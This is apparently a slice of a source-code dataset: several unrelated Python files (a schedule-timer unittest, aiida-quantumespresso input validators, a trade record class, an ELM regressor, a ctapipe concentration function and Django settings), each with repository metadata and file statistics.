] | 1 | 2021-06-18T18:23:36.000Z | 2021-06-18T18:23:36.000Z | import unittest
import datetime
from app import ScheduleHandler
class TestScheduleHandler(unittest.TestCase):
def test_timer(self):
class PartialIrcBot(ScheduleHandler):
pass
t = PartialIrcBot()
df = "%d/%m/%Y %H:%M:%S"
for d in [9, 10, 11, 12, 13]:
d_str = "{}/10/2017".format(d)
for h in range(24):
h_str = "{}:00:00".format(str(h).zfill(2))
dt = datetime.datetime.strptime("{d} {h}".format(d=d_str, h=h_str), df)
if h < 9 or h >= 18:
self.assertFalse(t.timer_should_execute(dt))
else:
self.assertTrue(t.timer_should_execute(dt))
for d in [14, 15]:
d_str = "{}/10/2017".format(d)
for h in range(24):
h_str = "{}:00:00".format(str(h).zfill(2))
dt = datetime.datetime.strptime("{d} {h}".format(d=d_str, h=h_str), df)
self.assertFalse(t.timer_should_execute(dt))
| 31.090909 | 87 | 0.517544 | 138 | 1,026 | 3.73913 | 0.355072 | 0.031008 | 0.069767 | 0.110465 | 0.567829 | 0.527132 | 0.527132 | 0.387597 | 0.387597 | 0.387597 | 0 | 0.061493 | 0.334308 | 1,026 | 32 | 88 | 32.0625 | 0.693997 | 0 | 0 | 0.416667 | 0 | 0 | 0.065302 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.041667 | false | 0.041667 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47240275a74da00053f650b9e1be9d450a7288f2 | 6,150 | py | Python | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Utility functions for validation of command line interface parameter inputs."""
from aiida.cmdline.utils import decorators
from aiida.common import exceptions
import click
@decorators.with_dbenv()
def validate_kpoints_mesh(ctx, param, value):
"""Command line option validator for a kpoints mesh tuple.
The value should be a tuple of three positive integers out of which a KpointsData object will be created with a mesh
equal to the tuple.
:param ctx: internal context of the click.command
:param param: the click Parameter, i.e. either the Option or Argument to which the validator is hooked up
:param value: a tuple of three positive integers
:returns: a KpointsData instance
"""
# pylint: disable=unused-argument
from aiida.orm import KpointsData
if not value:
return None
if any(not isinstance(integer, int) for integer in value) or any(int(i) <= 0 for i in value):
raise click.BadParameter('all values of the tuple should be positive greater than zero integers')
try:
kpoints = KpointsData()
kpoints.set_kpoints_mesh(value)
except ValueError as exception:
raise click.BadParameter(f'failed to create a KpointsData mesh out of {value}\n{exception}')
return kpoints
@decorators.with_dbenv()
def validate_hubbard_parameters(structure, parameters, hubbard_u=None, hubbard_v=None, hubbard_file_pk=None):
"""Validate Hubbard input parameters and update the parameters input node accordingly.
If a valid hubbard_file_pk is provided, the node will be loaded and returned.
:param structure: the StructureData node that will be used in the inputs
:param parameters: the Dict node that will be used in the inputs
:param hubbard_u: the Hubbard U inputs values from the cli
:param hubbard_v: the Hubbard V inputs values from the cli
:param hubbard_file_pk: a pk referencing a SinglefileData with Hubbard parameters
:returns: the loaded SinglefileData node with Hubbard parameters if valid pk was defined, None otherwise
:raises ValueError: if the input is invalid
"""
from aiida.orm import SinglefileData, load_node
if len([value for value in [hubbard_u, hubbard_v, hubbard_file_pk] if value]) > 1:
raise ValueError('the hubbard_u, hubbard_v and hubbard_file_pk options are mutually exclusive')
hubbard_file = None
if hubbard_file_pk:
try:
hubbard_file = load_node(pk=hubbard_file_pk)
except exceptions.NotExistent:
ValueError(f'{hubbard_file_pk} is not a valid pk')
else:
if not isinstance(hubbard_file, SinglefileData):
ValueError(f'Node<{hubbard_file_pk}> is not a SinglefileData but {type(hubbard_file)}')
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 2
parameters['SYSTEM']['hubbard_parameters'] = 'file'
elif hubbard_v:
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 2
parameters['SYSTEM']['hubbard_parameters'] = 'input'
parameters['SYSTEM']['hubbard_v'] = []
for value in hubbard_v:
parameters['SYSTEM']['hubbard_v'].append(value)
elif hubbard_u:
structure_kinds = structure.get_kind_names()
hubbard_kinds = [value[0] for value in hubbard_u]
if not set(hubbard_kinds).issubset(structure_kinds):
raise ValueError('kinds in the specified Hubbard U is not a strict subset of the structure kinds')
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 0
parameters['SYSTEM']['hubbard_u'] = {}
for kind, value in hubbard_u:
parameters['SYSTEM']['hubbard_u'][kind] = value
return hubbard_file
def validate_starting_magnetization(structure, parameters, starting_magnetization=None):
"""Validate starting magnetization parameters and update the parameters input node accordingly.
:param structure: the StructureData node that will be used in the inputs
:param parameters: the Dict node that will be used in the inputs
:param starting_magnetization: the starting magnetization inputs values from the cli
:raises ValueError: if the input is invalid
"""
if not starting_magnetization:
return
structure_kinds = structure.get_kind_names()
magnetization_kinds = [kind for kind, magnetization in starting_magnetization]
if not set(magnetization_kinds).issubset(structure_kinds):
raise ValueError('kinds in the specified starting magnetization is not a strict subset of the structure kinds')
parameters['SYSTEM']['nspin'] = 2
parameters['SYSTEM']['starting_magnetization'] = {}
for kind, magnetization in starting_magnetization:
parameters['SYSTEM']['starting_magnetization'][kind] = magnetization
def validate_smearing(parameters, smearing=None):
"""Validate smearing parameters and update the parameters input node accordingly.
:param parameters: the Dict node that will be used in the inputs
:param smearing: a tuple of a string and float corresponding to type of smearing and the degauss value
:raises ValueError: if the input is invalid
"""
if not any(smearing):
return
valid_smearing_types = {
'gaussian': ['gaussian', 'gauss'],
'methfessel-paxton': ['methfessel-paxton', 'm-p', 'mp'],
'marzari-vanderbilt': ['marzari-vanderbilt', 'cold', 'm-v', 'mv'],
'fermi-dirac': ['fermi-dirac', 'f-d', 'fd'],
}
for _, options in valid_smearing_types.items():
if smearing[0] in options:
break
else:
raise ValueError(
f'the smearing type "{smearing[0]}" is invalid, choose from {", ".join(list(valid_smearing_types.keys()))}'
)
if not isinstance(smearing[1], float):
raise ValueError('the smearing value should be a float')
parameters['SYSTEM']['occupations'] = 'smearing'
parameters['SYSTEM']['smearing'] = smearing[0]
parameters['SYSTEM']['degauss'] = smearing[1]
| 39.423077 | 120 | 0.696585 | 803 | 6,150 | 5.215442 | 0.220423 | 0.068768 | 0.027937 | 0.032951 | 0.344556 | 0.31638 | 0.256208 | 0.231614 | 0.219198 | 0.175263 | 0 | 0.002685 | 0.212683 | 6,150 | 155 | 121 | 39.677419 | 0.862247 | 0.30374 | 0 | 0.180723 | 0 | 0.012048 | 0.265478 | 0.026259 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048193 | false | 0 | 0.060241 | 0 | 0.168675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4725bdc2094e9f435b0639c37370a8daffc3e956 | 2,197 | py | Python | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | from enum import Enum
import os
import sys
import inspect
import logging
import datetime
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from Utils.Utils import Actions
class Trade():
def __init__(self, date_string, action, quantity, symbol, price, fee, sdr):
try:
self.date = datetime.datetime.strptime(date_string, '%d/%m/%Y')
if not isinstance(action, Actions):
raise ValueError("Invalid action")
self.action = action
self.quantity = quantity
self.symbol = symbol
self.price = price
self.fee = fee
self.sdr = sdr
self.total = self.__compute_total()
except Exception as e:
logging.error(e)
raise ValueError("Invalid argument")
def to_dict(self):
return {
'date': self.date.strftime('%d/%m/%Y'),
'action': self.action.name,
'quantity': self.quantity,
'symbol': self.symbol,
'price': self.price,
'fee': self.fee,
'stamp_duty': self.sdr
}
@staticmethod
def from_dict(item):
if any(['date' not in item, 'action' not in item, 'quantity' not in item, 'symbol' not in item, 'price' not in item, 'fee' not in item, 'stamp_duty' not in item]):
raise ValueError('item not well formatted')
return Trade(item['date'], Actions[item['action']], item['quantity'],
item['symbol'], float(item['price']), float(item['fee']), float(item['stamp_duty']))
def __compute_total(self):
if self.action in (Actions.DEPOSIT, Actions.WITHDRAW, Actions.DIVIDEND):
return self.quantity
elif self.action == Actions.BUY:
cost = (self.price / 100) * self.quantity
return cost + self.fee + ((cost * self.sdr) / 100)
elif self.action == Actions.SELL:
cost = (self.price / 100) * self.quantity
total = cost + self.fee + ((cost * self.sdr) / 100)
return total * -1
return 0
| 34.873016 | 171 | 0.578971 | 262 | 2,197 | 4.790076 | 0.282443 | 0.027888 | 0.050199 | 0.033466 | 0.084462 | 0.084462 | 0.039841 | 0 | 0 | 0 | 0 | 0.009702 | 0.296313 | 2,197 | 62 | 172 | 35.435484 | 0.80207 | 0 | 0 | 0.037037 | 0 | 0 | 0.088757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.12963 | 0.018519 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472734dfa2d0143ee41b2ebd5310df9144aa63b2 | 497 | py | Python | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | 3 | 2017-06-15T17:42:20.000Z | 2021-04-04T14:11:21.000Z | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | null | null | null | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | 2 | 2017-02-14T08:05:25.000Z | 2017-03-11T08:26:35.000Z | from collections import namedtuple
from config.config import CONF
PlayerInfo = namedtuple('PlayerInfo', ['team', 'slack_name'])
class PlayerNotFound(Exception):
def __init__(self, player):
msg = "Player '{}' cannot be found in player-to-team " \
"mapping.".format(player)
super(PlayerNotFound, self).__init__(msg)
def player_info(player):
try:
return PlayerInfo(*CONF['players'][player])
except KeyError:
raise PlayerNotFound(player)
| 26.157895 | 64 | 0.672032 | 54 | 497 | 6 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209256 | 497 | 18 | 65 | 27.611111 | 0.824427 | 0 | 0 | 0 | 0 | 0 | 0.171026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.153846 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472b0a2f2e9b3fe1b62227a85d0dd389ed036ca6 | 18,590 | py | Python | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 84 | 2015-03-08T07:39:47.000Z | 2022-03-06T03:41:23.000Z | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 11 | 2015-09-10T04:01:26.000Z | 2021-06-01T23:04:46.000Z | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 70 | 2015-03-30T10:20:14.000Z | 2022-03-06T03:41:24.000Z | # -*- coding: utf-8 -*-
"""
This file contains ELMKernel classes and all developed methods.
"""
# Python2 support
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from .mltools import *
import numpy as np
import optunity
import ast
import sys
if sys.version_info < (3, 0):
import ConfigParser as configparser
else:
import configparser
try:
from scipy.special import expit
except ImportError:
_SCIPY = 0
else:
_SCIPY = 1
# Find configuration file
from pkg_resources import Requirement, resource_filename
_ELMR_CONFIG = resource_filename(Requirement.parse("elm"), "elm/elmr.cfg")
class ELMRandom(MLTools):
"""
A Python implementation of ELM Random Neurons defined by Huang[1].
An ELM is a single-hidden layer feedforward network (SLFN) proposed by
Huang back in 2006, in 2012 the author revised and introduced a new
concept of using kernel functions to his previous work.
This implementation currently accepts both methods proposed at 2012,
random neurons and kernel functions to estimate classifier/regression
functions.
Let the dimensionality "d" of the problem be the sum of "t" size (number of
targets per pattern) and "f" size (number of features per pattern).
So, d = t + f
The data will be set as Pattern = (Target | Features).
If database has *N* patterns, its size follows *Nxd*.
Note:
[1] Paper reference: Huang, 2012, "Extreme Learning Machine for
Regression and Multiclass Classification"
Attributes:
input_weight (numpy.ndarray): a random matrix (*Lxd-1*) needed
to calculate H(**x**).
output_weight (numpy.ndarray): a column vector (*Nx1*) calculated
after training, represent :math:\\beta.
bias_of_hidden_neurons (numpy.ndarray): a random column vector
(*Lx1*) needed to calculate H(**x**).
param_function (str): function that will be used for training.
param_c (float): regularization coefficient (*C*) used for training.
param_l (list of float): number of neurons that will be used for
training.
param_opt (bool): a boolean used to calculate an optimization
when number of training patterns are much larger than neurons
(N >> L).
Other Parameters:
regressor_name (str): The name of classifier/regressor.
available_functions (list of str): List with all available
functions.
default_param_function (str): Default function if not set at
class constructor.
default_param_c (float): Default parameter c value if not set at
class constructor.
default_param_l (integer): Default number of neurons if not set at
class constructor.
default_param_opt (bool): Default boolean optimization flag.
Note:
* **regressor_name**: defaults to "elmr".
* **default_param_function**: defaults to "sigmoid".
* **default_param_c**: defaults to 2 ** -6.
* **default_param_l**: defaults to 500.
* **default_param_opt**: defaults to False.
"""
def __init__(self, params=[]):
"""
Class constructor.
Arguments:
params (list): first argument (*str*) is an available function,
second argument (*float*) is the coefficient *C* of
regularization, the third is the number of hidden neurons
and the last argument is an optimization boolean.
Example:
>>> import elm
>>> params = ["sigmoid", 1, 500, False]
>>> elmr = elm.ELMRandom(params)
"""
super(self.__class__, self).__init__()
self.available_functions = ["sigmoid", "multiquadric"]
self.regressor_name = "elmr"
self.default_param_function = "sigmoid"
self.default_param_c = 2 ** -6
self.default_param_l = 500
self.default_param_opt = False
self.input_weight = []
self.output_weight = []
self.bias_of_hidden_neurons = []
# Initialized parameters values
if not params:
self.param_function = self.default_param_function
self.param_c = self.default_param_c
self.param_l = self.default_param_l
self.param_opt = self.default_param_opt
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
# ########################
# Private Methods
# ########################
def __set_random_weights(self, number_of_hidden_nodes,
number_of_attributes):
"""
Initialize random values to calculate function
Arguments:
number_hidden_nodes (int): number of neurons.
number_of_attributes (int): number of features.
"""
self.input_weight = np.random.rand(number_of_hidden_nodes,
number_of_attributes) * 2 - 1
self.bias_of_hidden_neurons = np.random.rand(number_of_hidden_nodes, 1)
def __map_hidden_layer(self, function_type, number_hidden_nodes, data):
"""
Map argument "data" to the hidden layer feature space.
Arguments:
function_type (str): function to map input data to feature
space.
number_hidden_nodes (int): number of hidden neurons.
data (numpy.ndarray): data to be mapped to feature space.
Returns:
numpy.ndarray: mapped data.
"""
number_of_data = data.shape[0]
if function_type == "sigmoid" or function_type == "sig" or \
function_type == "sin" or function_type == "sine" or \
function_type == "hardlim" or \
function_type == "tribas":
temp = np.dot(self.input_weight, data.conj().T)
bias_matrix = np.tile(self.bias_of_hidden_neurons,
number_of_data)
temp = temp + bias_matrix
elif function_type == "mtquadric" or function_type == "multiquadric":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = temp.conj().T + \
np.tile(self.bias_of_hidden_neurons ** 2, number_of_data)
elif function_type == "gaussian" or function_type == "rbf":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = \
np.multiply(temp.conj().T, np.tile(self.bias_of_hidden_neurons,
number_of_data))
else:
print("Error: Invalid function type")
return
if function_type == "sigmoid" or function_type == "sig":
if _SCIPY:
h_matrix = expit(temp)
else:
h_matrix = 1 / (1 + np.exp(-temp))
elif function_type == "sine" or function_type == "sin":
h_matrix = np.sin(temp)
elif function_type == "mtquadric" or function_type == "multiquadric":
h_matrix = np.sqrt(temp)
elif function_type == "gaussian" or function_type == "rbf":
h_matrix = np.exp(temp)
else:
print("Error: Invalid function type")
return
return h_matrix
def _local_train(self, training_patterns, training_expected_targets,
params):
# If params not provided, uses initialized parameters values
if not params:
pass
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
number_of_attributes = training_patterns.shape[1]
self.__set_random_weights(self.param_l, number_of_attributes)
h_train = self.__map_hidden_layer(self.param_function, self.param_l,
training_patterns)
# If N >>> L, param_opt should be True
if self.param_opt:
self.output_weight = np.linalg.solve(
(np.eye(h_train.shape[0]) / self.param_c) +
np.dot(h_train, h_train.conj().T),
np.dot(h_train, training_expected_targets))
else:
self.output_weight = np.dot(h_train, np.linalg.solve(
((np.eye(h_train.shape[1]) / self.param_c) + np.dot(
h_train.conj().T, h_train)),
training_expected_targets))
training_predicted_targets = np.dot(h_train.conj().T,
self.output_weight)
return training_predicted_targets
def _local_test(self, testing_patterns, testing_expected_targets,
predicting):
h_test = self.__map_hidden_layer(self.param_function, self.param_l,
testing_patterns)
testing_predicted_targets = np.dot(h_test.conj().T, self.output_weight)
return testing_predicted_targets
# ########################
# Public Methods
# ########################
def search_param(self, database, dataprocess=None, path_filename=("", ""),
save=False, cv="ts", of="rmse", f=None, eval=50):
"""
Search best hyperparameters for classifier/regressor based on
optunity algorithms.
Arguments:
database (numpy.ndarray): a matrix containing all patterns
that will be used for training/testing at some
cross-validation method.
dataprocess (DataProcess): an object that will pre-process
database before training. Defaults to None.
path_filename (tuple): *TODO*.
save (bool): *TODO*.
cv (str): Cross-validation method. Defaults to "ts".
of (str): Objective function to be minimized at
optunity.minimize. Defaults to "rmse".
f (list of str): a list of functions to be used by the
search. Defaults to None, this set all available
functions.
eval (int): Number of steps (evaluations) to optunity algorithm.
Each set of hyperparameters will perform a cross-validation
method chosen by param cv.
Available *cv* methods:
- "ts" :func:`mltools.time_series_cross_validation()`
Perform a time-series cross-validation suggested by Hydman.
- "kfold" :func:`mltools.kfold_cross_validation()`
Perform a k-fold cross-validation.
Available *of* function:
- "accuracy", "rmse", "mape", "me".
See Also:
http://optunity.readthedocs.org/en/latest/user/index.html
"""
if f is None:
search_functions = self.available_functions
elif type(f) is list:
search_functions = f
else:
raise Exception("Invalid format for argument 'f'.")
print(self.regressor_name)
print("##### Start search #####")
config = configparser.ConfigParser()
if sys.version_info < (3, 0):
config.readfp(open(_ELMR_CONFIG))
else:
config.read_file(open(_ELMR_CONFIG))
best_function_error = 99999.9
temp_error = best_function_error
best_param_function = ""
best_param_c = 0
best_param_l = 0
for function in search_functions:
if sys.version_info < (3, 0):
elmr_c_range = ast.literal_eval(config.get("DEFAULT",
"elmr_c_range"))
neurons = config.getint("DEFAULT", "elmr_neurons")
else:
function_config = config["DEFAULT"]
elmr_c_range = ast.literal_eval(function_config["elmr_c_range"])
neurons = ast.literal_eval(function_config["elmr_neurons"])
param_ranges = [[elmr_c_range[0][0], elmr_c_range[0][1]]]
def wrapper_opt(param_c):
"""
Wrapper for optunity.
"""
if cv == "ts":
cv_tr_error, cv_te_error = \
time_series_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
elif cv == "kfold":
cv_tr_error, cv_te_error = \
kfold_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
else:
raise Exception("Invalid type of cross-validation.")
if of == "accuracy":
util = 1 / cv_te_error.get_accuracy()
else:
util = cv_te_error.get(of)
# print("c:", param_c, "util: ", util)
return util
optimal_pars, details, _ = \
optunity.minimize(wrapper_opt,
solver_name="cma-es",
num_evals=eval,
param_c=param_ranges[0])
# Save best function result
if details[0] < temp_error:
temp_error = details[0]
if of == "accuracy":
best_function_error = 1 / temp_error
else:
best_function_error = temp_error
best_param_function = function
best_param_c = optimal_pars["param_c"]
best_param_l = neurons
if of == "accuracy":
print("Function: ", function,
" best cv value: ", 1/details[0])
else:
print("Function: ", function,
" best cv value: ", details[0])
# MLTools Attribute
self.cv_best_rmse = best_function_error
# elmr Attribute
self.param_function = best_param_function
self.param_c = best_param_c
self.param_l = best_param_l
print("##### Search complete #####")
self.print_parameters()
return None
def print_parameters(self):
"""
Print current parameters.
"""
print()
print("Regressor Parameters")
print()
print("Regularization coefficient: ", self.param_c)
print("Function: ", self.param_function)
print("Hidden Neurons: ", self.param_l)
print()
print("CV error: ", self.cv_best_rmse)
print("")
print()
def get_available_functions(self):
"""
Return available functions.
"""
return self.available_functions
def train(self, training_matrix, params=[]):
"""
Calculate output_weight values needed to test/predict data.
If params is provided, this method will use at training phase.
Else, it will use the default value provided at object
initialization.
Arguments:
training_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for training.
params (list): a list of parameters defined at
:func:`ELMKernel.__init__`
Returns:
:class:`Error`: training error object containing expected,
predicted targets and all error metrics.
Note:
Training matrix must have target variables as the first column.
"""
return self._ml_train(training_matrix, params)
def test(self, testing_matrix, predicting=False):
"""
Calculate test predicted values based on previous training.
Args:
testing_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for testing.
predicting (bool): Don't set.
Returns:
:class:`Error`: testing error object containing expected,
predicted targets and all error metrics.
Note:
Testing matrix must have target variables as the first column.
"""
return self._ml_test(testing_matrix, predicting)
@copy_doc_of(MLTools._ml_predict)
def predict(self, horizon=1):
return self._ml_predict(horizon)
@copy_doc_of(MLTools._ml_train_iterative)
def train_iterative(self, database_matrix, params=[], sliding_window=168,
k=1):
return self._ml_train_iterative(database_matrix, params,
sliding_window, k)
| 35.75 | 83 | 0.537063 | 1,969 | 18,590 | 4.858812 | 0.187913 | 0.024459 | 0.016097 | 0.011916 | 0.308874 | 0.271245 | 0.217519 | 0.186474 | 0.141319 | 0.141319 | 0 | 0.010515 | 0.375901 | 18,590 | 519 | 84 | 35.818882 | 0.814084 | 0.31603 | 0 | 0.312236 | 0 | 0 | 0.052376 | 0 | 0 | 0 | 0 | 0.003854 | 0 | 1 | 0.054852 | false | 0.004219 | 0.059072 | 0.008439 | 0.164557 | 0.084388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472d943521309da5bdb5ecbc1180c718f5245c0f | 1,561 | py | Python | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import astropy.units as u
from ..instrument import CameraGeometry
from ..containers import ConcentrationContainer
from .hillas import camera_to_shower_coordinates
from ..utils.quantities import all_to_value
__all__ = ["concentration_parameters"]
def concentration_parameters(geom: CameraGeometry, image, hillas_parameters):
"""
Calculate concentraion values.
Concentrations are ratios of the amount of light in certain
areas to the full intensity of the image.
These features are usefull for g/h separation and energy estimation.
"""
h = hillas_parameters
unit = h.x.unit
pix_x, pix_y, x, y, length, width, pixel_width = all_to_value(
geom.pix_x, geom.pix_y, h.x, h.y, h.length, h.width, geom.pixel_width, unit=unit
)
delta_x = pix_x - x
delta_y = pix_y - y
# take pixels within one pixel diameter from the cog
mask_cog = (delta_x ** 2 + delta_y ** 2) < pixel_width ** 2
conc_cog = np.sum(image[mask_cog]) / h.intensity
if hillas_parameters.width.value != 0:
# get all pixels inside the hillas ellipse
longi, trans = camera_to_shower_coordinates(
pix_x, pix_y, x, y, h.psi.to_value(u.rad)
)
mask_core = (longi ** 2 / length ** 2) + (trans ** 2 / width ** 2) <= 1.0
conc_core = image[mask_core].sum() / h.intensity
else:
conc_core = 0.0
concentration_pixel = image.max() / h.intensity
return ConcentrationContainer(
cog=conc_cog, core=conc_core, pixel=concentration_pixel
)
| 30.607843 | 88 | 0.679052 | 225 | 1,561 | 4.506667 | 0.368889 | 0.015779 | 0.027613 | 0.04931 | 0.019724 | 0.019724 | 0 | 0 | 0 | 0 | 0 | 0.009967 | 0.2287 | 1,561 | 50 | 89 | 31.22 | 0.832226 | 0.189622 | 0 | 0 | 0 | 0 | 0.019417 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.206897 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472df55e17729fcc47b160990f5f92d48d797df5 | 5,647 | py | Python | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | config/settings.py | jochenklar/django-project | ae46a6bdaf7a7711a3862009754c27f953d5f8eb | [
"MIT"
] | null | null | null | import os
from pathlib import Path
import dj_database_url
from django.utils.translation import gettext_lazy as _
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = os.getenv('SECRET_KEY')
DEBUG = (os.getenv('DEBUG', 'False').upper() == 'TRUE')
DEBUG_TOOLBAR = (os.getenv('DEBUG_TOOLBAR', 'False').upper() == 'TRUE')
ALLOWED_HOSTS = os.getenv('ALLOWED_HOSTS', 'localhost 127.0.0.1 ::1').split()
INTERNAL_IPS = ['127.0.0.1']
SITE_ID = 1
INSTALLED_APPS = [
# django apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.staticfiles',
# 3rd party apps
'django_extensions',
]
if DEBUG_TOOLBAR:
INSTALLED_APPS += [
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django_settings_export.settings_export'
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
if os.getenv('DATABASE'):
DATABASES = {
'default': dj_database_url.parse(os.getenv('DATABASE'))
}
LANGUAGE_CODE = 'en-us'
LANGUAGES = [
('en', _('English')),
]
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root/')
STATICFILES_DIRS = []
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media_root/')
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
